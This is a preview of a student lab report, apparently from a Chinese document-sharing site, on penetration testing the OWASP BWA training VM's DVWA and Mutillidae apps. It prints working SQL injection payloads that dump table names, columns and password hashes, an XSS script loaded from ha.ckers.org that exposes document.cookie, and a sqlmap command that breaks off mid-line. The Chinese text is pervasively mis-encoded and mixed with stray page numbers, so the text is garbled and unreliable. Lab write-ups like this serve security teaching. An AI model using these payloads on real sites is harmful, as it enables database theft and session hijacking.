web應(yīng)用程序滲透測(cè)試

web應(yīng)用程序滲透測(cè)試

ID:14058853

大?。?.67 MB

頁(yè)數(shù):18頁(yè)

時(shí)間:2018-07-25

web應(yīng)用程序滲透測(cè)試_第1頁(yè)
web應(yīng)用程序滲透測(cè)試_第2頁(yè)
web應(yīng)用程序滲透測(cè)試_第3頁(yè)
web應(yīng)用程序滲透測(cè)試_第4頁(yè)
web應(yīng)用程序滲透測(cè)試_第5頁(yè)
資源描述:

《web應(yīng)用程序滲透測(cè)試》由會(huì)員上傳分享,免費(fèi)在線閱讀,更多相關(guān)內(nèi)容在行業(yè)資料-天天文庫(kù)

1、Web應(yīng)用程序滲透測(cè)試姓名:滕召維學(xué)號(hào):13084139一、實(shí)驗(yàn)?zāi)康?.學(xué)習(xí)使用OWASPBWA靶機(jī)。2.學(xué)習(xí)使用KaliLinux進(jìn)行Web應(yīng)用程序滲透測(cè)試。二、實(shí)驗(yàn)內(nèi)容1.使用w3af漏洞掃描器對(duì)OWASPBWA靶機(jī)進(jìn)行漏洞掃描。2.根據(jù)老師的課堂講授,按照課件相關(guān)內(nèi)容在OWASPBWA靶機(jī)上實(shí)踐XSS和SQL注入兩種攻擊。3.配合使用TamperData和sqlmap進(jìn)行sql注入攻擊。4.利用文件上傳漏洞植入Webshell。三、主要實(shí)驗(yàn)結(jié)果(一)使用w3af漏洞掃描器對(duì)OWASPBWA靶機(jī)進(jìn)行漏洞掃描1.啟動(dòng)w3af漏洞掃描器。2.編輯新建的Profile,也就是配置

2、各種插件。對(duì)audit類插件勾選sqli和xss兩個(gè)插件,如下圖:對(duì)crawl類插件只勾選web_spider,如下圖18對(duì)web_spider的配置在窗口右側(cè),勾選only_forward并保存,如下圖對(duì)output類插件,只勾選輸出html文件。對(duì)輸出文件的配置在窗口右側(cè),如下圖輸入文件名稱并保存。這樣掃描結(jié)果將保存在/root/dvwa.html文件中。4.如下圖在Target一欄輸入掃描的網(wǎng)址,單擊右側(cè)按鈕start啟動(dòng)掃描。掃描過(guò)程中18掃描結(jié)果18(二)在OWASPBWA靶機(jī)上實(shí)踐XSS和SQL注入兩種攻擊1.在KaliLinux攻擊主機(jī)上,按照課件第29頁(yè),實(shí)踐“

3、通過(guò)SQL注入攻擊繞過(guò)身份認(rèn)證機(jī)制”。182.XSS和SQL注入攻擊(1)在攻擊機(jī)上訪問(wèn)http://www.dvssc.com/dvwa,按照1.的攻擊方法,登錄進(jìn)入DVWA訓(xùn)練系統(tǒng)。18(2)首先按照?qǐng)D示將DVWA應(yīng)用的安全等級(jí)設(shè)置為L(zhǎng)ow。(3)按照課件29-31頁(yè),實(shí)踐SQL注入攻擊。使用OWASPBWA靶機(jī)的DVWA應(yīng)用程序演示如何獲取后臺(tái)數(shù)據(jù)庫(kù)更多的信息。輸入文件“XSS&SQLi.txt”中的腳本。將數(shù)據(jù)表中的每一行都顯示出來(lái),輸入:'or'1=118查詢INFORMATION_SCHEMA系統(tǒng)表,輸入:'UNIONSELECT1,table_namefromIN

4、FORMATION_SCHEMA.tables--'列出user表的內(nèi)容,輸入:'UNIONSELECT1,column_namefromINFORMATION_SCHEMA.columnswheretable_name='users'--'18④取得口令的MD5值,輸入:'UNIONSELECTNULL,passwordfromusers--'⑤使用concat()函數(shù)將所有的信息都列出來(lái),輸入:'UNIONSELECTpassword,concat(first_name,'',last_name,'',user)fromusers--'18(4)按照課件第40頁(yè),實(shí)踐反射式

5、XSS攻擊。輸入輸入(5)按照課件第43頁(yè),訪問(wèn)http://www.dvssc.com/mutillidae,登錄進(jìn)入mutilidae訓(xùn)練系統(tǒng),實(shí)踐存儲(chǔ)式XSS攻擊。訪問(wèn)Mutillidae的CrossSiteScripting(XSS)輸入:xss.js的內(nèi)容如下:document.write("Thisisremotete

6、xtviaxss.jslocatedatha.ckers.org"+document.cookie);alert("Thisisremotetextviaxss.jslocatedatha.ckers.org"+document.cookie);首先按照sql注入攻擊登錄進(jìn)入mutilidae訓(xùn)練系統(tǒng)18輸入:document.write("Thisisremotetextviaxss.jslocatedatha.ckers.org"+document.cookie);al

7、ert("Thisisremotetextviaxss.jslocatedatha.ckers.org"+document.cookie);(三)配合使用TamperData和sqlmap進(jìn)行sql注入攻擊18重復(fù)(二)中步驟2-(1)和2-(2)。啟動(dòng)TamperData插件。4.按照課件33頁(yè)使用Sqlmap進(jìn)行SQL注入攻擊。(1)掃描,輸入:sqlmap-u'http://10.10.10.129/dvwa/vulnerabilities/sqli/?id=aa&Submit=Sub

當(dāng)前文檔最多預(yù)覽五頁(yè),下載文檔查看全文

此文檔下載收益歸作者所有

當(dāng)前文檔最多預(yù)覽五頁(yè),下載文檔查看全文
溫馨提示:
1. 部分包含數(shù)學(xué)公式或PPT動(dòng)畫(huà)的文件,查看預(yù)覽時(shí)可能會(huì)顯示錯(cuò)亂或異常,文件下載后無(wú)此問(wèn)題,請(qǐng)放心下載。
2. 本文檔由用戶上傳,版權(quán)歸屬用戶,天天文庫(kù)負(fù)責(zé)整理代發(fā)布。如果您對(duì)本文檔版權(quán)有爭(zhēng)議請(qǐng)及時(shí)聯(lián)系客服。
3. 下載前請(qǐng)仔細(xì)閱讀文檔內(nèi)容,確認(rèn)文檔內(nèi)容符合您的需求后進(jìn)行下載,若出現(xiàn)內(nèi)容與標(biāo)題不符可向本站投訴處理。
4. 下載文檔時(shí)可能由于網(wǎng)絡(luò)波動(dòng)等原因無(wú)法下載或下載錯(cuò)誤,付費(fèi)完成后未能成功下載的用戶請(qǐng)聯(lián)系客服處理。